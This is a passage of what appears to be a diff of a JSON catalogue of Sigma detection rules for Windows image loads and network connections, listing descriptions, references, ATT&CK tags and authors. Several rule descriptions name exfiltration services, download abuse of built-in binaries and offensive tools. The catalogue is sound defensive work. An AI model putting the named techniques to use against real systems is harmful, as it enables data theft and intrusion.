"671bb7e3-a020-4824-a00e-2ee5b55f385e", - "value": "WMI Modules Loaded", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2019/08/10", - "filename": "image_load_wmi_module_load.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMI command line event consumers", - "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "value": "WMI Persistence - Command Line Event Consumer", - "meta": { - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" - ], - "tags": [ - "attack.t1546.003", - "attack.persistence" - ], - "creation_date": "2018/03/07", - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown (data set is too small; further testing needed)" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", - "value": "Suspicious WSMAN Provider Image Loads", - "meta": { - "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", - "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", - "https://github.com/bohops/WSMan-WinRM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" - ], - "creation_date": "2020/06/24", - "filename": "image_load_wsman_provider_image_load.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable in the Windows folder accessing github.com", - "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "value": "Microsoft Binary Github Communication", - "meta": { - "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" - ], - "creation_date": "2017/08/24", - "filename": "net_connection_win_binary_github_com.yml", - "author": "Michael Haag (idea), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown", - "@subTee in your network" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "value": "Microsoft Binary Suspicious Communication Endpoint", - "meta": { - "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105" - ], - "creation_date": "2018/08/30", - "filename": "net_connection_win_binary_susp_com.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", - "value": "Certutil Initiated Connection", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/09/02", - "filename": "net_connection_win_certutil.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate certutil network connection" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects process connections to a Monero crypto mining pool", - "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "value": "Windows Crypto Mining Pool Connections", - "meta": { - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496" - ], - "creation_date": "2021/10/26", - "filename": "net_connection_win_crypto_mining.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "value": "Dead Drop Resolvers", - "meta": { - "refs": [ - "https://content.fireeye.com/apt-41/rpt-apt41", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" - ], - "creation_date": "2022/08/17", - "filename": "net_connection_win_dead_drop_resolvers.yml", - "author": "Sorina Ionescu", - "level": "high", - "falsepositive": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects Dllhost that communicates with public IP addresses", - "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", - "value": "Dllhost Internet Connection", - "meta": { - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" - ], - "creation_date": "2020/07/13", - "filename": "net_connection_win_dllhost_net_connections.yml", - "author": "bartblaze", - "level": "medium", - "falsepositive": [ - "Communication to other corporate systems that use IP addresses from public address spaces" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects network connections from Equation Editor", - "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", - "value": "Equation Editor Network Connection", - "meta": { - "refs": [ - "https://twitter.com/forensicitguy/status/1513538712986079238", - "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203" - ], - "creation_date": "2022/04/14", - "filename": "net_connection_win_eqnedt.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "value": "Excel Network Connections", - "meta": { - "refs": [ - "https://corelight.com/blog/detecting-cve-2021-42292", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203" - ], - "creation_date": "2021/11/10", - "filename": "net_connection_win_excel_outbound_network_connection.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", - "level": "medium", - "falsepositive": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", - "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", - "value": "HH.EXE Network Connections", - "meta": { - "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ], - "creation_date": "2022/10/05", - "filename": "net_connection_win_hh.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", - "value": "Download a File with IMEWDBLD.exe", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", - "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/01/22", - "filename": "net_connection_win_imewdbld.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", - "value": "Suspicious Typical Malware Back Connect Ports", - "meta": { - "refs": [ - "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1571" - ], - "creation_date": "2017/03/19", - "filename": "net_connection_win_malware_backconnect_ports.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "value": "Communication To Mega.nz", - "meta": { - "refs": [ - "https://megatools.megous.com/", - "https://www.mandiant.com/resources/russian-targeting-gov-business", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.001" - ], - "creation_date": "2021/12/06", - "filename": "net_connection_win_mega_nz.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of mega.nz uploaders and tools" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "value": "Msiexec Initiated Connection", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/01/16", - "filename": "net_connection_win_msiexec.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate msiexec over networks" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "uuid": "18249279-932f-45e2-b37a-8925f2597670", - "value": "Communication To Ngrok.Io", - "meta": { - "refs": [ - "https://ngrok.com/", - "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.001" - ], - "creation_date": "2022/07/16", - "filename": "net_connection_win_ngrok_io.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of ngrok.io" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", - "value": "Communication To Ngrok Tunneling Service", - "meta": { - "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" - ], - "creation_date": "2022/11/03", - "filename": "net_connection_win_ngrok_tunnel.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of ngrok" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious network connection by Notepad", - "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", - "value": "Notepad Making Network Connection", - "meta": { - "refs": [ - "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", - "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2020/05/14", - "filename": "net_connection_win_notepad_network_connection.yml", - "author": "EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", - "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", - "value": "PowerShell Network Connections", - "meta": { - "refs": [ - "https://www.youtube.com/watch?v=DLtJTxMWZ2o", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/13", - "filename": "net_connection_win_powershell_network_connection.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Administrative scripts", - "Microsoft IP range" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", - "value": "Python Initiated Connection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", - "https://pypi.org/project/scapy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2021/12/10", - "filename": "net_connection_win_python.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate python script" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "value": "RDP Over Reverse SSH Tunnel", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2019/02/16", - "filename": "net_connection_win_rdp_reverse_tunnel.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", - "value": "RDP to HTTP or HTTPS Target Ports", - "meta": { - "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", - "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2022/04/29", - "filename": "net_connection_win_rdp_to_http.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "value": "Regsvr32 Network Activity", - "meta": { - "refs": [ - "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/10/25", - "filename": "net_connection_win_regsvr32_network_activity.yml", - "author": "Dmitriy Lifanov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "value": "Remote PowerShell Session (Network)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2019/09/12", - "filename": "net_connection_win_remote_powershell_session_network.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a rundll32 that communicates with public IP addresses", - "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", - "value": "Rundll32 Internet Connection", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" - ], - "creation_date": "2017/11/04", - "filename": "net_connection_win_rundll32_net_connections.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Communication to other corporate systems that use IP addresses from public address spaces" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", - "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", - "value": "Script Initiated Connection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/08/28", - "filename": "net_connection_win_script.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate scripts" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", - "value": "Script Initiated Connection to Non-Local Network", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/08/28", - "filename": "net_connection_win_script_wan.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate scripts" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible remote connections to Silenttrinity c2", - "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", - "value": "Silenttrinity Stager Msbuild Activity", - "meta": { - "refs": [ - "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.t1127.001" - ], - "creation_date": "2020/10/11", - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", - "author": "Kiran kumar s, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "uuid": "20384606-a124-4fec-acbb-8bd373728613", - "value": "Suspicious Network Connection Binary No CommandLine", - "meta": { - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/03", - "filename": "net_connection_win_susp_binary_no_cmdline.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious network connection by Cmstp", - "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "value": "Cmstp Making Network Connection", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], - "creation_date": "2022/08/30", - "filename": "net_connection_win_susp_cmstp.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", - "value": "Suspicious Dropbox API Usage", - "meta": { - "refs": [ - "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/20", - "filename": "net_connection_win_susp_dropbox_api.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of the API with a tool that the author wasn't aware of" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", - "value": "Suspicious Epmap Connection", - "meta": { - "refs": [ - "https://github.com/RiccardoAncarani/TaskShell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/07/14", - "filename": "net_connection_win_susp_epmap.yml", - "author": "frack113, Tim Shelton (fps)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "value": "Suspicious Outbound Kerberos Connection", - "meta": { - "refs": [ - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" - ], - "creation_date": "2019/10/24", - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "high", - "falsepositive": [ - "Other browsers" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", - "value": "Microsoft Sync Center Suspicious Network Connections", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" - ], - "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2022/04/28", - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", - "author": "elhoim", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "uuid": "9976fa64-2804-423c-8a5b-646ade840773", - "value": "Suspicious Outbound SMTP Connections", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://www.ietf.org/rfc/rfc2821.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2022/01/07", - "filename": "net_connection_win_susp_outbound_smtp_connections.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Other SMTP tools" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects programs with network connections running in suspicious files system locations", - "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "value": "Suspicious Program Location with Network Connections", - "meta": { - "refs": [ - "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2017/03/19", - "filename": "net_connection_win_susp_prog_location_network_connection.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "value": "Suspicious Outbound RDP Connections", - "meta": { - "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - 